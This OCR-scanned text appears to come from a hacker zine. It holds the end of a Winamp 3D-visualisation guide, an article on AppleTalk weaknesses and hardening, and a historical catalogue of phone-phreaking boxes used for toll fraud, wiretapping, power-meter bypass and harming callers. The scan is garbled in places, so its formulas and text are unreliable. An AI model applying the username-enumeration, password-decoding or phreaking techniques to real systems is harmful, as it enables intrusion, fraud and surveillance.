xatty powt sin{i*3. 14159), 1 )/2)+(c*cos(2*y)) 
+0.05; y=P2-1.0; x=x*1.5-0.09; 

This is only slightly more complex than a flat 
surfaced (in 3-space) scope. When the OnBeat 1 
function is run, the offset between the two scopes 
is randomized between 0.07 and 0.15. Every 
frame, the offset is reduced to 90 percent of its. 
previous value (the scope appears to shri nk back: 
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tection isn't that great, during good house music 
or anything with good bass, you will definitely 
"see" the effect. You can get another neat effect 
by making two sets of scopes - one vertical, one 
horizontal - and have them come out of the screen 
OnBeat random amounts, with or without decay. 
To make a 3D horizontal scope, I use the follow- 
ing settings for each scope: 

Blue Scope: 

Init: n=40; t=0; tv=0.1:dt=l; 

Per Frame: t=1*0,9+1v*0, | 

Per Point: y=t+v*{pow(sin(i*3.14159),1 \/2); 
x=1*2-1.04+(0.03*co5(2*x)): 

v=y*1.5; 

Red Scape: 

Init: n=40; t=0; tv=0.1 :dt=1:; 

On Beat: c=((rand( 100)/100)*0.07)+0.08; 

Per Frament=10,94tv*0. 1 ¡c=0c*.9; (this would 
be to decay the scope back ta the screen, other- 
wise remove the latter equation) 

Per Pointry=t+v*(pow(sin( (3.14159), 1 42); 
x=i*2-7.0+(e*cos(2*x))+0.05; 

y=y*1.S; 

Another interesting effect you could try would 
be to change cos(2*x) to abs(cos(4*3.14159*x)), 
This would make two 3D ripples in the analyzer. 
Instead of just coming out once, it would come 
out, go back in, out, and in again. 

What Can’t I Do to the Presets? 

| strongly recommend you make your own - 
mine are just working guides. You probably can 
do a lot better if you've ever made winamp AVS 
settings before - until this project I never tried. 
However, don't think that you will throw some 
crazy blur effect into the mix and it will be even 
more trippy. For this effect to work, the blue pixel 
must be immediately offset to the left of the red 


pixel for your eyes to combine them into a single 


3D point. P ve found to get the most effective 3D 
effect, keep your presets clean. Whatever effects 
you do attempt to add, keep in mind, if the red 
and blue lines cross (this is a reference to a verti- 
cal scope - in a horizontal scope, they will cross 
all the time), you will lose the 3D effect immedi- 
ately. 

It would be really interesting to get a dot- 
plane working with this effect, but unfortunately 
lve found that there are far too many dots at most 
angles to not have one dot plane overlap a large 
portion of the other, You could do this by writing 
an-AVS plugin in C++, but that is outside the 
scope of this article. 

What Can I Do with the Presets? 

Noting the limitations above, you can have 
some damn cool effects. The most noticeable 
thing you can do is modify "c" in the formula dy- 
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namically, WinAMP’s AVS Studio contains the 
ability to do “OnBeat" modifications to your vari- 
ables, 
Calibrating Your Preset 

To get the best 3D effect, you want the bright- 
est color of red that still appears dark to the eye 
seeing through the blue cellophane, and vice 
versa, To find the right shade of blue, double click 
on the blue bar near the bottom-right of the win- 
dow. Put on your glasses. Close your right eye. 
Choose a shade of blue that appears dark to your 
left eye. You should now be looking at the light- 
to-dark blue vertical gradient near the bottom 
right of the color selector through the red cello- 
phane. Move the brightness selector upwards as 
high as it goes while it still appears black, or near 
black. This will make the color as noticeable as 
possible to your right eye while still appearing as 
nothing to your left eye. Click okay, and calibrate 
the second "Render/Superscope" color by doing 
the opposite of what you did for the first. If when 
looking at the presets through the glasses you can 
see what almost looks like shadows of the scopes 
on the screen itself, try darkening the chosen 
shades of blue and red. 

Other Ideas with the Glasses 

Obviously, WinAMP AVS modules are just 
one idea for these glasses. With basic VB skillz 
one could write 3D wireframing modules or a 
starfield generator in pseudo-3D, Of course, 
you're limited to the color of purple, but consid- 
ering you've paid about a dollar or less for these 
you shouldn't really complain. One suggestion 
I've had from a friend was to make an hour-long 
mixtape, export the whole thing to VHS and bring 
the tape, 20 pairs of the glasses, and a lot of 
booze/weed/cough syrup/whatever to a party and 
have a nice Massive trip. 

Conclusion 

Well, when it works, it works well. If you 
can't get your crazy ass preset to work on the first 
try, attempt to simplify it - ve found it’s a lot 
easier to see [wo scopes than one, but three or 
more need a warm up of simpler effects, Other 
things you can try are shifting your head from 
side to side - this helps you really see the effect 
I've found. If you have too many scopes (four in- 
stead of two), try changing the distance or angle 
you're viewing. Just experiment, half the fun's 
just seeing what you can come up with. Then 
again a good chunk of it is staying up til 4 am 
coaxing some cough syrup listening to Aphex 
Twin in headphones. 

Greetz; HackCanada, argv, clox, the other 
members of Priapism, JaidenKnight, all my local 
friends - you know who you are. 
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by Steven Kroner 
skreuzer@mac.com 

By most accounts. Apple clients and servers 
make up a small portion of the types of systems on 
any given network. However, Apple hardware and 
software have carved out a niche in certain areas 
such as design and multimedia along with the ed- 
ucational field, AppleTalk networks do exist. It is 
just that hackers and system administrators tend to 
overlook them. In mixed environments, the net- 
work managers tend to be highly proficient with 
Unix or Windows NT but don’t know, or care to 
know, about how AppleTalk networks actually 
work. They will take the minimum steps neces- 
sary to ensure that Apple clients can connect to 
network resources and once that is complete all is 
well and good. However, this lack of understand- 
ing can be used as a possible entry point into your 
network. This article was written using a Power 
Macintosh G4 running OS 92.2 and a dual 
processor Power Macintosh G4 running OS 9.1 
and AppleShare IP 6.3.3. It will address potential 
security holes and what you can do to harden both 
the client and server side of an AppleTalk network 

We will start off by examining the client side 
and one of the most common problems which also 
plagues other network protocols as well. Older 
Macintosh clients connecting to servers will send 
their password in clear text across the network. It 
is also possible that the server will force the client 
to send their password as clear text if it does not 
support other authentication algorithms, (Win- 
dows 2000 with AppleTalk support will do this.) 
This is one of the easiest problems to fix, and you 
have two very good solutions at hand. The first is 
to download an updated version of the AppleShare 
client that is available at http://www.appie.- 
com/appleshareip/texUdownleads.html. The sec- 
ond solution is a little more complex. If you open 
the AppleShare client in ResEdit and locate the 
“FSMNT" resource you will see a sub-resource la- 
beled "ApShare Mounter”. Open up that resource 
and do a search in ASCII for "Cleartxt". Once 
found, replace the “C” in “Cleartxt" with any other 
letter, Once that is complete, do the same for the 
"ApShare ExFS"” in the "EXFS" resource. Once 
that is complete, save your changes and move the 
file back into the extensions folder on the clien! 
machine. This will prevent the user from sending 
their password in clear text. 

Another problem is allowing users to save 
their login name and password. This creates an 
alias to the file server located in the "Servers" 
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hen the machine 
boots up, it will mount all file servers listed in that 
folder. This can become a problem if an attacker 
has physical access to a client machine. It is possi- 

ble to modify the AppleShare client so that the 
"Save my name and password” feature is disabled. 

A patch for that is available at 
http://homepage.mac.com/skreuzer. 

The last problem I will address on the client 
side is personal file sharing. Every Mac OS since 
version 7.0 has the ability to allow the end user to 
share his or her hard drive and allow remote con- 
nections. Most of the time when a person enables 
file sharing they don't assign a password to the 
system owner, thus allowing remote logins with 
full read and write privileges to the entire hard 
drive. Or a person will share the entire hard drive 
rather then make share points and give regular 
users read and write privileges to the whole hard 
drive, including the system folder. This will allow. 
an attacker access to vital system resources and 
also exposes things like preference files which can 
contain passwords used by different applications, 
It would also be possible to install a trojan or virus 
that will execute upon next startup by placing the 
file in the “Startup Items” folder. An attacker with 
malicious intent could erase certain parts of the 
hard drive. or the entire hard drive. To prevent this 
from occurring, you can remove the "File Sharing 
Extension" from the extensions folder in the sys- 
tem folder. This will remove the ability to start 
personal file sharing. 

On both AppleShare IP servers and Macintosh 
workstations running personal file sharing store 
usernames, passwords and group data in a file 
called "Users and Groups Data File" which js los 
cated in the preferences folder of the system 
folder. The encryption algorithm is very simple | 
and it is possible to decode passwords stored In 
this file. AppleShare IP does not allow you to 
share the system folder, so unless an attacker had 
physical access to the server or was able to exe- 
cute a trojan on the server side, you should not 
have to worry about the trivial encoding scheme - 
used, macfspwd.c, the Unix utility to decode the 
password is available from htip://happiness- | 
.dhs.org/software/mactspwd/mactspwd.c. 

The perceived simplicity of AppleShare IP 
(ASIP) makes it appealing to novice administra- 
tors who typically have little appreciation for se- 
curity. Out of the box, ASIP is very secure but 
certain steps can be taken to harden the out of the 
box configuration. One of the biggest drawbacks 
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of ASIP is its inability to keep access logs. (The 
web and mail server do log activity, but file shar- 
ing does not.) It is possible to get a list of users 
currently connected to the server, the connection 
method, and when they logged on, but this data is 
not written to any file so once they log off, all this 
information is lost. 

ASIP makes the enumeration of valid user- 
names a trivial task due to the fact that security 
was sacrificed for ease of use. When you use the 
AppleShare client to log onto a server, the return 
result from the server can be used to brute force 
valid usernames. When an invalid username is en- 
tered, the server responds with a kKO4MErMem- 
berObjectNotFound (error 29312) which 
translates to "Unknown user, invalid password or 
the login is disabled....”, but when a valid user- 
name with an invalid password is sent, the server 
responds with KOAMErrAuthenticationError (er- 
ror n29360) which translates to “Sorry, the pass- 
word you entered is incorrect...". With this it 
would be possible to write a script to read in user- 
names from a file and mimic the login process and 
parse the result to brute force enumerate valid 
usernames. TO protect yourself against this, make 
sure that the server disables accounts after multi- 
ple failed login attempts. With this feature and a 
secure user password in place, brute forcing be- 
comes much more difficult, if not impossible. The 
drawback is that ASIP only allows you to config- 
ure the minimum characters in a password. You 


are unable to force a user to mix numbers and let- 
ters; and you are unable to "blacklist" certain 
words like “password”. 

The final topic F will address in this article is 
related to user authentication. The algorithms for 
all of the AppleShare authentication methods are 
public. The most widely used authentication 
method is 2 Way randnum that sends two 8 byte 
DES encrypted random numbers over the net- 
work. From a computational standpoint the algo- 
rithm is exactly as strong as 36-bit DES and it has 
a password length limit of eight characters, Hi ts 
vulnerable to an offline password guessing attack 
similar to running crack against a Unix passwd 
file. Apple has developed a new authentication 
method that addresses the weaknesses of 2 Way 
randnum, called DHX. DHX uses Diffie-Hellman 
key exchange to create a 128-bit session key and 
then sends a 64-character password to the server 
encrypted with CAST 128. Its strength is approxi- 
mately equivalent to 128-bit SSL. 

I have only scratched the surface of the numer- 
ous potential vulnerabilities of AppleTalk net- 
works. In reality, on a well-configured AppleTalk 
network, it can be incredibly difficulty to bypass 
security. But certain tools and techniques can cre- 
ate access paths into your systems, I hope this arti- 
cle has sparked an interest, and system 


administrators will take a closer look at their net- 
works, 


The Definitive Guide 





_ Lo Phreak Boxes 


by Elf Qrin 
(www.ElfOrin.com) 


Traditionally in the phreaker culture, any de- | 


vice thought to be connected to a phone line is 
called a "box" and is named after a color since the 
first “blue box" invented by Captain Crunch, the 
father of the phreak scene. Since all colors were 
quickly used for this purpose, other fanciful names 
began to be used to name boxes. 

I've tried to make a definitive list of all the 
¿known "color boxes” with a brief description of 
leach. 
| Fve done a lot of research to find and classify 
them all, reading through about 300 documents. In 
“most cases T ve used quotes from the original doc- 
uments for the descriptions, 


Since most boxes were invented in the ‘80s or | 


¡early ‘90s, this article is mainly meant for infor- 


| mative and historical purposes. Many of these | 


boxes don't work nowadays. (Some may never 
have worked at all.) However, some still do. And 
sometimes similar models can even be found in 
stores, 
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I've catalogued 94 phreak boxes of 75 differ- 


| lugged i into he 
| with the ole 1 





ent kinds (counting only boxes with different 
functions), and 17 aliases (same box with a differ- 
ent name). 
E ve also inieliided. five non- -phreak boxes af 
boxes ngt ameant to bel 
ne lit 5-1 ey’ résmeant for use 
ar de mex ing ngle). 
Ao sd OF ie: nds and 17 







sie cea the box, pS E 
of another box.” Gatti 

When the name, ark box is included between 
square brackets 5 sy the box has-been created or rein- 
vented by se else using a different scheme 
and/or di ferent coftiponents 5. 

When théfe's bñe Box thatuses the name of an 
already existing box (supposedly because the au- 
thor was unaware of it), I've added to it a sequen- 
tial number between parentheses, such as (2), (3), 
etc. 
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(2600 Box) (another name for the Blue Box). | 


See Blue Box. 
Acrylic Box (aka Extended Bud Box). The 
purpose of this box is to get Three-Way Calling, 


Call Waiting, programmable Call Forwarding, and | 


an easier way of extended Bud Boxing, stealing 
¡them from the fortunate ones on your block, Cre- 
ated by The Pimp. 

ALF Box, A tone generator for the Apple He 


| with an ALF Music Synthesizer Card, Created by | 


Sir Briggs of the SouthCentral Discount Ware- 
meisters (SCDW) of Texas. 


Aqua Box. Every true phreaker lives in fear of | 
Lock in Trace.” For a long | 


the dreaded F.B.I, " 
time, it was impossible to escape from the lock in 
trace. This box offers an "escape route” by lower- 
ing the voltage on the phone line. Concept by Cap- 
tain Xerox. Plans by: The Traveler, 
Assassin Box (sometimes misspelled as As- 
[sasin Box, Asassin Box, Asasin Box). A box de- 
signed to scare, harm, or kill people at the phone 
by a shock of electricity right in the ear as soon as 
the victim starts dialing a number. This box was 
designed, because its authors, after trying a Day- 
| Glo Box for some weeks "were bored and decided 


[to move on to telephone terrorism.” Linked by 


Grim Reaper. 

[Beagan Box] (sometimes misspelled as Be- 
gan Box) [similar to Beige Box, Beige Box Revis- 
ited, Day-Glo Box]. See Beige Box. Concept and 
Design: Black Box. Beta Testing: Lord Reagan. 

Beige Box [similar to Beagan Box, Beige Box 

Revisited, Bud Box, Day-Glo Box]. A homemade 
lineman’s handset, also known as REMOBS (RE- 


Mote OBserving Systems). With a Beige Box you | 


can do the following things: "Eavesdropping; long 
‘distance, static-free free fone calls to phriends; di- 
aling direct to Alliance Conferencing (also static- 
free); phuking up people; bothering the operator at 
little risk to yourself; blue boxing with a greatly 
reduced chance of getting caught; anything at all 
that you want, since you are an extension on that 
line." Invented by The Exterminator and The Ter- 
minal Man, Date: Friday, May 17, 1985. 

[Beige Box Revisited] [similar to Beagan Box, 
Beige Box, Day-Glo Box]. See Beige Box. By 
Mercenary. Year: 1992 or later. 

Black Box. A Black Box is a device that is 
hooked up to your fone that fixes it so that when 


| you get a call, the caller doesn’t get charged for the | 


call. This is good for calls up to a half hour. After 
that the fone company gets suspicious, and then 
you can guess what happens. The original box was 
created in the USA. There are modified versions 
for other countries. Original author unknown. UK 
Black Box by K.5. Reach of The Hackers Acad- 
emy (March 1988). Greek Black Box by Fabulist 
land Enigma (year 1992), 
| Blast Box, All a Blast Box is is a really cheap 
[amplifier (around five watts or so) connected in 
place of the microphone on your telephone meant 


to talk to someone On the eee who just doesn't 
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| the Rainbow Box]. This box will do damage to] 





and red shows that yous are bette i is Created 





shut up. | 

Blast Box If. Similar to the Blast Box, but de- 
signed to blow up other people's computers, in- 
stead of their ears. 

Bleeper Box [UK version of the Blue Box]. 
The United Kingdom’s own version of the Blue 
Box, modified to work with the UK’s phone sys- 
tem. Based on the same principles. However, 
British Telecom uses two sets of frequencies, for-| 
ward and backward. 

Blotto Box. For years now every pirate has 
dreamed of the Blotto Box. It was at first made as | 
a joke to mock more ignorant people into thinking | 
that the function of it actually was possible. This) ` 
box quite simply, can turn off the phone lines! 
everywhere. Originally conceived by King Blotto. f 
Created by The Traveler. 

Blue Box (aka 2600 Box). The mother of all | 
boxes: The first box in history which started the 
whole phreaking scene. Invented by John Draper} 
(aka "Captain Crunch”) in the early 60's, who dis-f 
covered that by sending a tone of 2600Hz over the} 
telephone lines of AT&T, it was possible to make} 
free calls. In the 1960's, the makers of Cap'n} | 
Crunch breakfast cereal offered a toy-whistle prize | 
in every box as a treat for the Cap'n Crunch set. ] 


| Somehow John Draper (who called himself "Cap-| 


tain Crunch" since then) discovered that the toy] 
whistle just happened to produce a perfect 3600-1 
cycle tone. Discovered by Captain Crunch John] 
Draper). Year: early 1960's, 
(Blue Con Box) (short name for the Blue Con-} 
ference Box). See Blue Conference Box. | 
Blue Conference Box (aka Blue Con Box). Af 
Blue Box and a Con Box combined. | 
Bottle-Nosed Gray Box [selective version of} 










only your phone, the line between you and your} 
enemy, and your enemy's modem, whereas the] 
Rainbow Box just takes everything out. By The} 
Dolphin that came from Belmont. 

[Brown Box] (aka Opaque Box) [similar to 
Con Box, Party Box, Three Box]. Created by The} 
Doc | 


Bud Box. This box is quite similar to a Beige} 


| Box, except this is a portable unit. It is extremely 


handy for free voice calls and tapping a nearby] 
house’s line. Invented by Dr. D-Code and The} 
Pimp of The Slaughtered Chicken. | 
Busy Box. This box is attached to the outside 
of the person's house in their telephone box. It 
makes it so that when any phone inside that house 
is picked up, no dial tone is heard and no calls can} 
be received or sent. This is good for lame BBS's as]. 
they tend not to call out much, and it will remain} — 
undetected for a longer period of time. Invented by] — 
Black Death. 7 
Charging Box (aka Light Box). This box is} 7 
used to indicate when a call is being charged for | 
and when it is not. Once installed, the box has two] 
lights, a green one and a red one. Green means free} 
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by Stinky Pig Productions (a UK team). 

(Chart Box) (short name for the Chartreuse 

| Box). See Chartreuse Box. 

Chartreuse Box (aka Chart Box, Obnoxious 
Box). Your telephone line is a constant power 
source. This box is designed to allow you to tap 
that power source and give you up to 12 volts 
(more if you use a transformer). Created by 
Wonko The Sane. 
| Cheese Box. This box (named for the type of 
¡box the first one was found in) turns your home 
phone into a pay phone, It can be used together 
with a Red Box to make free calls. Created by 
Otho Radix (?). 

Chrome Box. A portable self-contained device 


to manipulate traffic signals. Not a phreak box. | 


Created by Remote Control. Date: June 14 1988. 

| Clear Box. This box works on "post-pay” pay- 
phones (a kind of payphone that could be found in 
Canada and in rural United States). In other words, 

| those phones that don't require payment until after 
the connection has been established, Y you don’t 
deposit money, you can't speak to the person at the 
other end, because your mouthpiece is cut off - but 
not your earpiece. (Yes, you can make free calls to 
the weather, etc. from such phones.) With this box 
‘the user is able to speak to the other person for 
free, The clear box thus "clears" up the problem oat 
not being heard. Author: Mr. French of 2600. 
Originally published in the July 1984 issue of 
2600. 

Cold Box. Usage unknown. Cited in the Blotto 
| Box document. Created by The Traveter. 

Con Box (aka Conference Box) [similar to 
Brown Box, Party Box, Three Box]. This box al- 
lows you to connect two lines in your house to 
give Three-Way type service, creating a party line. 

(Conference Box) (expanded name for the 
‘Con Box). See Con Box. 

| Copper Box. Uses cross-talk feedback to try to 
damage sensitive equipment of a phone company. 
| More a method than a real box. Conceived by The 
Cypher. Year: 1986. 

Crimson Box (sometimes misspelled as 
Chrimson Box) [similar to Green Box (2), Orange 
Box, Hold Box, Hold On Box, White Box (2), Yel- 
tow Box {(2)]. This box is a very simple device that 
will allow you to put someone on hold or make 
your phone busy with a large amount of ease. You 
flip a switch and the person can't hear you talking. 
| Flip it back and everything is peachy. It doesn't 
have a LED to show when hold mode is on. Cre- 
ated by Dr. D-Code. Year; 1985. 

Dark Box. Multi-Purpose Network Manipula- 
tion Unit. This box’s basic design allows you to 
call anywhere on earth without fear of being billed 
or traced. Created by Cablecast Operator of the 
Dark Side Research Group. Year: 1987, 

[Day-Glo Box] (aka DayGlo Box) [similar to 
Beige Box]. This box lets you place calls for free 
with no time limit, no possibility of a wiretap, and 






the calls can be placed from anywhere in the 
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world. Conceptualized by John F. Kennedy. | 

Diverti Box. Cited in the Blotto Box docu- 
ment. Probably used to divert a phone call. Cre- | 
ated by The Traveler, | 

Dioc Box, Call/receive on two lines with the 
option to conference them. By The Dark Lords of 
Chaos: Prowler, Apprentice, Pro Hack, Zeus, 
Tarkmeth, Blackstoke, Lazer. Date: October, 3 
1988. | 

DNA Box, Not actually a box but a project of 
the Outlaw Telecommandos to hack cellular 
phones in the early era of those devices (1989), Is- 
sued in February 1989. 

(Extended Bud Box) (another name for the: 
Acrylic Box). See Acrylic Box. | 

Fuzz Box, This box duplicates the tones of 
coins dropping down the phone chute, thereby al-| 
lowing the user to place calls without paying for 
them. 

Gold Box [similar to X-Gold Box]. When you 
put a gold box on two phone lines it lets anyone 
who calls one of the Imes call ont on the other. So 


| when the phone company traces the line it will tell | 


them that you're calling from the line you hooked 
the gold box up to. By Dr. Revenge. cosysop of 
Modem Madness (516). 

Grab Box. This box uses inductive coupling to 
jota with any radio that uses a coil for an antenna 
(such as an AM, longwave, or shortwave radio) 
and allows you to lengthen it considerably. Not a| 
phreak box. This kind of box can be commonly 
found in an electronic shop. By Shadowspawn. 

Green Box. This box generates tones for Coin 
Collect, „Coin Return, and Ringback. It must be 
used by the CALLED party. 

[Green Box (2)] [similar to Crimson Box, Or- 
ange Box, Hold Box, Hold On Box, White Box 
(2), Yellow Box (23]. A hold button. See Crimson 
Box. 

(Gray Box) (another name for the Silver Box), 
See Silver Box. 

[Hold Box] [similar to Crimson Box, Green | 
Box (2), Orange Box. Hold On Box, White Box 
(2), Yellow Box (2)]. A hold button. See Crimson | 
Box. 

[Hold On Box] [similar to Crimson Box, 
Green Box (2), Orange Box, Hold Box, White Box: 
(2), Yellow Box (2)]. A hold button. See Crimson 
Box. ; 

Infinity Box (sometimes misspelled as Infiity 
Box). When the phone number of a telephone con- 
taining an infinity box device is dialed and a cer- | 


| tain note is blown into the phone from a Hohner} 


Key of C harmonica, the bugged phone does not 
ring and, what's more, enables the caller to then 
hear everything said in the room that the phone is 
located in. As long as the caller wants to stay on 
the phone, all ts open to him or her. If the phone is 
lifted off the hook, the transmitter is disconnected 


and the "bugged" party receives a dial tone as if 
| nothing was wrong with the line. Description by 


Iron Man of The Crack Shop. From the original 
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"Infinity Transmitter" by Manny Mittleman. 
In-Use Light Box. A device that signals 
whether or not an extension of a particular phone 
line is off-hook. It does nor indicate whether or not 
a phone is being tapped, and will light whenever 
any extension is picked up. By The Night Owl AE. 


Jack Box. A device to generate tones created — 


starting from a phone keypad. 
Jolly Box. Software written in 8086 assembly 
| which generates several phone tones ("Multi-Fre- 
quenz-Demon-Dialer for Global Access"). Code 
by Jolly Reger. Updated by Zaphod Beeblebrox of 
Control Team. Date: probably 1993 or earlier. 

(Light Box) (another name for the Charging 
Box). See Charging Box. 

Loud Box. Makes your voice louder over the 
phone line. Especially meant for use in conference 
calls. Designed, written and built by Mr. Bill. 

Lunch Box (aka Tap Box). The Lunch Box is a 
very simple transmitter used for eavesdropping. It 
is quite small and can easily be put in a number of 
places. Created by Dr. D-Code. 

Magenta Box. When you call up line one from 
your house, you will get a dial tone almost imme- 
diately. Using DTMF you can dial anywhere that 
the person who owns line two has service to. 
Which means you can direct dial Alliance, Aus- 
tralia, and your favorite BBS for free. Designed by 
Street Fighter, 

Magenta Box (2). A portable ringing generator 
which, if connected to a phone line, will make the 
phone on the end of it ring. It works by using a re- 
lay as a vibrator to generate AC which is then 
‘stepped up by a transformer and fed through a ca- 
pacitor into the phone line to make the phone ring. 

Mauve Box, Generates a magnetic field to tap 
| the nearest phone conversation (somehow similar 
to Tempest, the system to tap video screens), Cre- 
ated by Captain Generic with help from The Ge- 
netic Mishap. Date: November, 24 1986 - 19:08. 

Meeko Box. A multi-purpose box with the fol- 
lowing features: It is able to record telephone con- 
versations with excellent quality. It is able to play 


la source directly into the phone line. It can keep — 


[the phone line open. You can box without using a 
phone, and headphones (requires a modem). De- 
signed by Meeko of Hi-ReS UK. Year: 1994. 

Mega Box. A cable rerouter to hook up a sec- 
ond line in your house. 


Modu Box (aka Modula Box). A second phone — 


plug attached to an existing one. Designed by 
| Magnus Adept. 

(Modula Box) (expanded name for the Modu 
Box). See Modula Box. 

[Music Box] [similar to Pink Box (2)]. It’s ba- 
sically a Pink Box (2) without the LED. See Pink 
Box (2). Created by Aluminium Gerbul. 

Mute Box. This box lets the user receive long 
distance calls without being detected. 


Neon Box (aka Record-o-Box) (erroneously | 


}used as an alias for the Blast Box II) [similar to 


Sound Blaster Box, Rock Box, Slug Box], A de- 
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vice that adds a normal jack interface to a tele- 
phone, allowing the sending of music or tones into] 
the phone line, or the recording of conversations | 
using the microphone input of a recorder. This] 
kind of box can be commonly found in a phone 
shop. 

Noise Box [similar to the Scarlet Box]. It is aj 
device you can attach to a victim's phone line so 
that an abnormal amount of noise will be present 
on the line at all times, which would make data] 
transmissions almost impossible and voice com-| 
munications annoying, to say the least, By Doctor} 
Dissector of Phortune 500. 

(Obnoxious Box) (another name for the Char-[ — 
treuse Box). See Chartreuse Box. | 

Olive Box, An alternative ring for your phone 
with a light that also flashes when the phone rings. | 
By Arnold, sysop of Hobbit Hole AE (HHAE)} 
East Branch. 

(Opaque Box) (another name for the Brown: 
Box). See Brown Box. 

[Orange Box] [similar to Crimson Box, Green 
Box (2), Hold Box, Hold On Box, White Box (2). 
Yellow Box (2)]. A hold button. See Crimson Box. f 

Paisley Box. A multipurpose box that com- 
bines the functions of several boxes, including 
blue, beige, and blotto. Among other things can 
seize operator lines and remotely control all TSPS] 
and TOPS consoles. By Blade of the Neon Fuckeaf 
Knights. | 

Pandora Box. A device that generates a high 
intensity sound to produce pain. A similar device | 
(usually called "phasor") is commonly sold in se-| 
curity shops for personal defense. By Dr. Rat of 
Rat Labs, S.F, CA. Year: 1986. 

[Party Box] |similar to Brown Box, Three | 
Box, Con Box]. This box allows free Three-Way | 
calling, connects two phone conversations at once, | 
without any static or excess wiring, or even having | 
two phone lines. Created by Greyhawke of The}, 
Dark Knights (TDK), 

Pearl Box [similar to Pearl Box 2 - Advanced] 
Pearl Box]. This is a box that may substitute for] 
many boxes which produce tones in hertz. The} 
Pearl Box when operated correctly can produce} 
tones from 1-9999Hz. As you can see, 2600, 1633, 
1336, and other crucial tones are obviously in tts! 
sound spectrum (yet you'd need two Pearl Boxes} 7 
to generate combined tones, such as the ones off | 
the dialpad). Created by Dr. D-Code. Year: before 
1989. 

[Pearl Box 2 - Advanced Pearl Box] [similar 
to Pearl Box]. A Pearl Box made in an easier and 
cheaper way. Created and Tested by Dispater. 
Date: July 1 1989. 

Pink Box. Allows you to hook two separate! 
phone lines together to have Three-Way calling| 
with hold on either line, as well as bringing a dial 
tone into the conversation with someone and al-| 
lowing them to dial the number with touch tones 
so it will connect Three-Way. When they hang up, | 
it will disconnect Three-Way calling. No more} 
























| 
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need to play with the hook for Three-Way. 


Pink Box (2) [similar to Music Box]. The 


function of a "Pink Box” is to add hold button that 
allows music Or anything else to be played into the 
‘telephone while the person is on hold. This modifi- 
cation can either be done right in the telephone or 
as a separate box. This kind of box can be com- 
monly found in a phone shop. 
| Plaid Box. Turns a pulse phone line into a 
touch phone capable line. 

(Portable Gray Box) (another name for the 
Gray Box). See Portable Silver Box. 

Portable Silver Box (aka Portable Gray Box). 


A batteries-operated Silver Box that can fit in a | 


pocket for use in payphones or wherever. By The 
Phone Phantom. 

[Power Box] [similar to Tron Box]. The power 
box is a simple device that will allow you to com- 
| pletely bypass the meter-reading equipment of the 

power company. It works by connecting the power 
line running into your house directly instead of 
through the meter (which records electricity usage 
for the power company). When implemented cor- 


rectly, there is no possible way that you can be de- _ 


tected by the power company and therefore save 
many hundreds of dollars through its use. Not a 
phreak box, Concept and Plans by Cursor. Date: 
| August 9 1990. 

Puce Box. This box emits vaporous LSD. Line 
noise may cause strychnine formation. 

Purple Box. This box allows switching be- 
tween two phone lines. putting one of them on 
hold. A LED shows which line is on hold. Created 
by The Flash, Date: February 26 1956. 

Rainbow Box [non selective version of the 
Bottle-Nosed Gray box]. Connects the electric line 
to the phone line blowing up everything. Odds are 


you will take out every phone in the neighborhood | 


and get caught. By The Dolphin that came from 
Belmont. 

Razz Box. This box allows you to tap your 
neighbor's line without your neighbor knowing it. 
You can also make free phone calls. Written by 
The Razz and released by The Magnet of Crime 
Ring International, Date: November 12 1988. 

(Record-o-Box) (another name for the Neon 
Box). See Neon Box. 

Red Box [similar to the Red Box Whistle]. The 
Red Box basically simulates the sounds of coins 
being dropped into the coin slot of a payphone. 
The traditional Red Box consists of a pair of 

| Wien-bridge oscillators with the timing controlled 

¡by 555 timer chips. 

| [Red Box Whistle] [similar to the Red Box]. A 
phreak in the Midwest has extensively tested a 

| method of red boxing which uses nothing more 


¡than a pair of brass or aluminum whistles. This | 


method is very similar to the original blue boxing 
vas It was discovered by Cap'n Crunch. Reported 
by The Researcher. 

Red Green Box [combines a Red Box and a 
¡Green Box]. This is a device that generates the 
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tones for red boxing and green boxing. By Pink} 
Panther. 

Ring/Busy Box. When connected to a phone 
line, this box will cause a busy signal anytime a 
call is made to that particular line. They can still 
use their phone to make outgoing calls. By 
MOrtaSkuld. 

[Rock Box - Basic] [similar to the Rock Box - 
Advanced, Neon Box, Sound Blaster Box]. The 
Rock Box channels the music from the stereo out 
to the phone line via the headphone output. It also 


| can record Conversations. Created and designed by 


Video Vindicator of the Shadows of IGA. 

[Rock Box - Advanced] [similar to the Rock 
Box - Basic, Neon Box, Sound Blaster Box]. The 
Kock Box channels the music from the stereo out 
to the phone line via the headphone output, lt also 
can record conversations. The Advanced version 
has more complex wiring and better audio quality. 
Created and designed By Video Vindicator of the 
Shadows of IGA. 

Sand Box, Usage unknown. Cited in the Crim- 
son Box document. By Dr. D-Code. Year: 1985 or | 
1986. 

[Scarlet Box] [similar to the Noise Box}. The 
purpose of a Scarlet Box is to create a very bad 
connection. It can be used to crash a BBS or just 
make life miserable for those you seek revenge 
upon. Written and created by The Pimp. 

Servo Box. Uses R/C car servos to change 
lines in poles outside of house, This could be af 
nice idea, but very expensive and hard to do. 

Silver Box (aka Gray Box) [similar to Solid 
State Silver Box]. The silver box transforms keys 
3,6. 9, #to special keys A, B, C, D. 

[Slug Box] [similar to the Neon Box]. A slug | 
box is a recording box that stops and starts the tape 
recorder when a connection is made. Date: May 14 
1990, 10:18 pm. 

Snow Box. An underground television trans- | 
mitter built using commercially available parts. | 
Not a phreak box. Date: June 13 1988, 

Solid State Silver Box (can be shortened as 
SSSilver Box) [similar to Silver Box]. This box | 
uses an integrated circuit to generate the tones | 
rather than converting a phone keypad. | 

(SSSilver Box) (short name for the Solid State 
Silver Box). See Solid State Silver Box. 

[Sound Blaster Box] [similar to Neon Box, | 
Rock Box]. A device that adds a normal jack inter- 


face to a telephone, allowing the sending of music | 


or tones into the phone line, or the recording of 
conversations using the microphone input of a 
recorder. Better than a Neon Box. By Shad- 
owHawk. Date: March 31 1994. 

Static Box. This box keeps the voltage regu- 
lated so that you can avoid static. This allow a 
more stable line for high speed modems (which at, 
the time meant 2400bps). In a certain way it's the | 


| opposite of boxes like the Noise Box, Created by 


The Usurper and The Raver of the Lords of Twi-| 
light. Date: Originally released on November 21 
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11986. Second release on December 27 1987. 

| Switch Box, With the Switch Box you can put 
¡one or both phone lines on hold with visible indi- 
cators of each line’s status, conference call with 
two people, change a phone from line 1 to line 2 
and lastly, make one phone line physically dead to 

| the outside world. By Autopsy Saw. 

Sword Box, The sword box is just essentially a 
¡Bud/Beige/Day-Glo Box with enhancements and 
modifications. The structural differences in the 
Sword Box make it better however, and thus safer 
for you to use, By Grim Reaper/STS. Date: No- 
vember 22 1987, 

Tan Box (it’s not the short name of the Tanger- 
